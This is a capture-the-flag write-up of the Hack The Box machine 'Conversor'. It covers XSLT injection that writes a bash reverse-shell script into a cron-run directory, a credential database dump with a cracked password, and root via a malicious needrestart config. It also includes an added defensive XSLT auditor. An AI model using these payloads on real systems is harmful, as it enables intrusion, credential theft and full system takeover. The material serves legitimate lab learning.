Hackthebox: Conversor

Foued SAIDI

Overview

Conversor is an easy-difficulty machine from Hack The Box that starts with a web application allowing XSLT file uploads. By leveraging XSLT injection to write a malicious Python script into a cron-executed directory, we gain initial access as www-data. From there, we extract a SQLite database containing user credentials, crack the hash, and pivot to user fismathack. Privilege escalation abuses a sudo misconfiguration on needrestart, which allows loading an arbitrary configuration file to achieve root.

Conversor-info-card

Reconnaissance

Starting with a port scan, we identify two open services.

```
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)
|_ 256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://conversor.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 80 redirects to http://conversor.htb/ — we add it to /etc/hosts and proceed.

Web Enumeration

The application is an XSLT converter. Navigating to the About page reveals a link to download the source code.

```
http://conversor.htb/static/source_code.tar.gz
```

Reviewing the source, we find the application accepts XSLT file uploads and processes them. Looking at install.md, we find a cronjob definition that executes every Python script under the scripts/ directory every minute as www-data.

```
"""

* * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 "$f"; done

"""
```

This is interesting — if we can write a .py file into /var/www/conversor.htb/scripts/, it will be executed automatically.

XSLT Injection - Initial Access

XSLT injection can be leveraged not just for reading files, but also for writing files using the exslt:document extension. We craft a malicious XSLT stylesheet that writes a Python reverse shell into the cron-executed scripts/ directory.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:ptswarm="http://exslt.org/common"
extension-element-prefixes="ptswarm"
version="1.0">
<xsl:template match="/">
<ptswarm:document href="/var/www/conversor.htb/scripts/shell.py" method="text">
import os

os.system(
"bash -c 'bash -i &gt;&amp; /dev/tcp/10.10.16.10/9001 0&gt;&amp;1'")
</ptswarm:document>
</xsl:template>
</xsl:stylesheet>
```
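The weakness above is that the XSLT processor is allowed to honour a write-capable extension element. As an added defensive example (not code from the writeup or the Conversor application), the check below runs over an uploaded stylesheet before it reaches the processor and flags the constructs that let a transform read or write files; `audit_xslt`, the placeholder path and both sample stylesheets are constructed for this illustration.

```python
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
EXSLT_COMMON_NS = "http://exslt.org/common"  # namespace of exsl:document
# XPath functions that read files or URLs outside the input document
RISKY_XPATH = re.compile(r"\b(document|unparsed-text)\s*\(")

def _split_tag(tag):
    """'{ns}local' -> (ns, local); un-namespaced tags get ns ''."""
    if tag.startswith("{"):
        ns, _, local = tag[1:].partition("}")
        return ns, local
    return "", tag

def audit_xslt(xslt_text):
    """Return findings for an uploaded stylesheet; an empty list means clean.
    Matching is by namespace URI, so the prefix the author picked is irrelevant."""
    data = xslt_text.encode("utf-8") if isinstance(xslt_text, str) else xslt_text
    findings = []
    for elem in ET.fromstring(data).iter():
        if not isinstance(elem.tag, str):  # skip comments / processing instructions
            continue
        ns, local = _split_tag(elem.tag)
        if ns == EXSLT_COMMON_NS and local == "document":
            findings.append(f"exsl:document writes to {elem.get('href')!r}")
        elif ns == XSL_NS and local in ("import", "include"):
            findings.append(f"xsl:{local} loads {elem.get('href')!r}")
        elif ns == XSL_NS and local == "stylesheet" and elem.get("extension-element-prefixes"):
            findings.append("extension elements enabled: " + elem.get("extension-element-prefixes"))
        for attr in ("select", "test", "match"):
            value = elem.get(attr)
            if value and RISKY_XPATH.search(value):
                findings.append(f"risky XPath in @{attr}: {value!r}")
    return findings

# Constructed samples. The second mirrors the shape of the writeup's stylesheet
# (arbitrary prefix bound to the EXSLT common namespace) with a placeholder
# path and a harmless body in place of the payload.
BENIGN_XSLT = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/"><xsl:value-of select="/nmaprun/@scanner"/></xsl:template>
</xsl:stylesheet>"""
MALICIOUS_XSLT = """<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:ptswarm="http://exslt.org/common" extension-element-prefixes="ptswarm" version="1.0">
<xsl:template match="/"><ptswarm:document href="/PLACEHOLDER/scripts/x.py" method="text">print("constructed")</ptswarm:document></xsl:template>
</xsl:stylesheet>"""
```

Calling `audit_xslt(MALICIOUS_XSLT)` returns two findings while the benign sample returns none; the authoritative control remains the processor's own policy, which for lxml means passing `access_control=XSLTAccessControl.DENY_WRITE` to `etree.XSLT` so exsl:document cannot write even if a stylesheet slips past a pre-check like this one.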

We upload the provided nmap.xslt file from http://conversor.htb/static/nmap.xslt as the XML input and our malicious XSLT file as the stylesheet. After waiting about a minute for the cronjob to trigger, we catch a reverse shell.

```
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.10] from (UNKNOWN) [10.129.123.196] 43572
bash: cannot set terminal process group (12609): Inappropriate ioctl for device
bash: no job control in this shell
www-data@conversor:~$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@conversor:~$
```

Lateral Movement

Enumerating the web application directory, we find a SQLite database under instance/.

```
www-data@conversor:~$ ls
ls
conversor.htb
www-data@conversor:~$ cd conversor.htb
cd conversor.htb
www-data@conversor:~/conversor.htb$ ls
ls
app.py
app.wsgi
instance
__pycache__
scripts
static
templates
uploads
www-data@conversor:~/conversor.htb$ cd instance
cd instance
www-data@conversor:~/conversor.htb/instance$ ls
ls
users.db
```

We exfiltrate users.db by base64-encoding it on the target, decoding it on our machine, and opening it with sqlite3 to dump the credentials.

```
┌──(kali㉿kali)-[~]
└─$ sqlite3 users.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
files users
sqlite> select * from users;
1|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec
5|kujen|9e76bf31e3d126e7343fbf989e196d43
sqlite>
```

Cracking the MD5 hash for fismathack gives us Keepmesafeandwarm. We su to the user and grab the user flag.

```
su fismathack
Password: Keepmesafeandwarm
id
uid=1000(fismathack) gid=1000(fismathack) groups=1000(fismathack)
bash
cd
cat user.txt
c462efcebb61b11cb0b36b8ae1a3c366
```

Privilege Escalation

Checking sudo permissions, fismathack can run needrestart as root without a password.

```
sudo -l
Matching Defaults entries for fismathack on conversor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User fismathack may run the following commands on conversor:
(ALL : ALL) NOPASSWD: /usr/sbin/needrestart
```

needrestart accepts a -c flag to specify a custom configuration file. Its configuration file is plain Perl that is evaluated when loaded, so any Perl code placed in it runs with the privileges of the sudo invocation, i.e. as root. We write a one-liner that sets the SUID bit on /bin/bash and pass it as the config file.

```
echo 'system("chmod +s /bin/bash")' > exp.sh
sudo /usr/sbin/needrestart -c exp.sh

Running kernel seems to be up-to-date.

No services need to be restarted.

No containers need to be restarted.

No user sessions are running outdated binaries.

No VM guests are running outdated hypervisor (qemu) binaries on this host.
ls -al /bin/bash
-rwsr-sr-x 1 root root 1396520 Mar 14 2024 /bin/bash
bash -p
id
uid=1000(fismathack) gid=1000(fismathack) euid=0(root) egid=0(root) groups=0(root),1000(fismathack)
cat /root/root.txt
45ade82a3db2d681742363c137fd7418
```

Hope you learned something new!

  • 0xkujen
  • Title: Hackthebox: Conversor
  • Author: Foued SAIDI
  • Created at: 2026-03-25 20:59:29
  • Updated at: 2026-03-25 21:38:36
  • Link: https://kujen5.github.io/2026/03/25/Hackthebox-Conversor/
  • License: This work is licensed under CC BY-NC-SA 4.0.